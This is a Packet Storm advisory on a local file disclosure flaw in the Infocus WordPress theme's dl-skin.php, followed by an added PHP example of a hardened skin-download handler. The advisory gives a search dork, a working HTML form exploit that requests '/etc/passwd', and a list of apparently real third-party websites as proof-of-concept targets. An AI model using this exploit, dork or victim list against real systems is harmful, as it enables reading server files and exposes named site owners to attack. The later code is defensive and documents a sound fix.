WordPress Infocus Local File Disclosure

2014-06-06T00:00:00
ID PACKETSTORM:126988
Type packetstorm
Reporter Felipe Andrian Peixoto
Modified 2014-06-06T00:00:00

Description

`[+] Post Local File Disclosure in WordPress theme Infocus  
  
[+] Date: 07/06/2014  
  
[+] CWE Number: CWE-98  
  
[+] Risk: High  
  
[+] Author: Felipe Andrian Peixoto  
  
[+] Dork: inurl:"/wp-content/themes/infocus/"  
  
[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486  
  
[+] Contact: felipe_andrian@hotmail.com  
  
[+] Tested on: Windows 7 and Linux  
  
[+] Vulnerable File: dl-skin.php  
  
[+] Exploit :   
  
<html>  
<body>  
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">  
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>  
<input type="submit">  
</form>  
</body>  
</html>  
  
[+] PoC: http://www.sonorabehavioral.com/wp-content/themes/infocus/lib/scripts/dl-skin.php  
http://www.harmonyhouse.uk.com/wp-content/themes/infocus/lib/scripts/dl-skin.php  
http://foulaneautoecole.com/wp-content/themes/infocus/lib/scripts/dl-skin.php  
  
  
eof  
`
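
One way a download handler can constrain the `_mysite_download_skin` parameter so that arbitrary paths are refused. This is an added example, not the theme's own code or the advisory author's; `SKIN_DIR`, `resolve_skin_path()` and the `.zip` naming rule are hypothetical, and only the parameter name comes from the advisory.

```php
<?php
// Added example, not the theme's code. SKIN_DIR and the ".zip" skin format
// are assumptions; only the parameter name comes from the advisory.
const SKIN_DIR = __DIR__ . '/skins';   // hypothetical directory of downloadable skins

/**
 * Resolve a client-supplied skin name to a file inside $baseDir.
 * Returns the canonical path, or null if the request must be refused.
 */
function resolve_skin_path(string $requested, string $baseDir = SKIN_DIR): ?string
{
    // Reject empty input and NUL bytes outright.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Accept a bare file name only: no slashes, no dots except the extension.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.zip\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // The canonical path must still sit under the skin directory, which
    // also refuses symlinks that point outside it.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Handler: runs only when this file is requested over HTTP with POST.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $name = $_POST['_mysite_download_skin'] ?? '';
    $path = is_string($name) ? resolve_skin_path($name) : null;
    if ($path === null) {
        http_response_code(400);
        exit('Invalid skin');
    }
    header('Content-Type: application/zip');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
    exit;
}
```

With this check, a value such as `/etc/passwd` fails the file-name pattern and the handler answers 400 without touching the filesystem.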